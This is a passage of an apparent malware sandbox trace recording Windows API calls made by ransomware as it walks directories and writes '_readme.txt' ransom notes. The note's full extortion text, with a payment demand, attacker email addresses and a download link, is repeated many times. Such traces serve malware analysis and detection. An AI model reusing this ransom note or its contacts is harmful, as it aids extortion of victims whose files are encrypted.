ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.911] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.911] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.911] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.911] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.911] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.911] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.911] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0209.911] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.911] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.912] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.912] PathFindFileNameW (pszPath="") returned="" [0209.912] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.912] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.912] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.912] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x800) returned 0x3a83058 [0209.912] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.912] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d9cb0 [0209.912] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.913] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.913] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0209.913] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.913] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0209.913] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.913] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.913] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.913] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.913] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.914] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.914] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.914] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.914] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.914] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.914] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.914] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534f8 [0209.914] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.915] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.915] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323dac8 [0209.915] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286440 [0209.915] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.915] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.915] PathFindFileNameW (pszPath="") returned="" [0209.915] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534f8 [0209.915] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.915] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.915] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x800) returned 0x3a83058 [0209.915] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.915] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d9428 [0209.916] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286440 [0209.916] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.916] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0209.916] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.916] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 0 [0209.916] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.916] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.916] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.916] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32da538 [0209.916] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0209.917] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x8c0) returned 0x3a83058 [0209.917] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x85a) returned 0x3a8ed68 [0209.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x3a8ed68, cbMultiByte=2138, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 1115 [0209.917] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a8f5d0 [0209.917] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned 1114 [0209.917] WriteFile (in: hFile=0x618, lpBuffer=0x3a8f5d0*, nNumberOfBytesToWrite=0x45a, lpNumberOfBytesWritten=0x397fb64, lpOverlapped=0x0 | out: lpBuffer=0x3a8f5d0*, lpNumberOfBytesWritten=0x397fb64*=0x45a, lpOverlapped=0x0) returned 1 [0209.918] CloseHandle (hObject=0x618) returned 1 [0209.919] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2cb6dd40, ftLastAccessTime.dwHighDateTime=0x1d5ff3c, ftLastWriteTime.dwLowDateTime=0x2cb6dd40, ftLastWriteTime.dwHighDateTime=0x1d5ff3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.919] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2cb6dd40, ftLastAccessTime.dwHighDateTime=0x1d5ff3c, ftLastWriteTime.dwLowDateTime=0x2cb6dd40, ftLastWriteTime.dwHighDateTime=0x1d5ff3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.919] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0209.919] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240b10 [0209.919] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240a08 [0209.919] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x1c) returned 0x3286440 [0209.919] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x32409b0 [0209.919] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0209.919] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d598 [0209.919] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d600 [0209.919] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x38) returned 0x3277d68 [0209.919] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240b10 [0209.919] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, 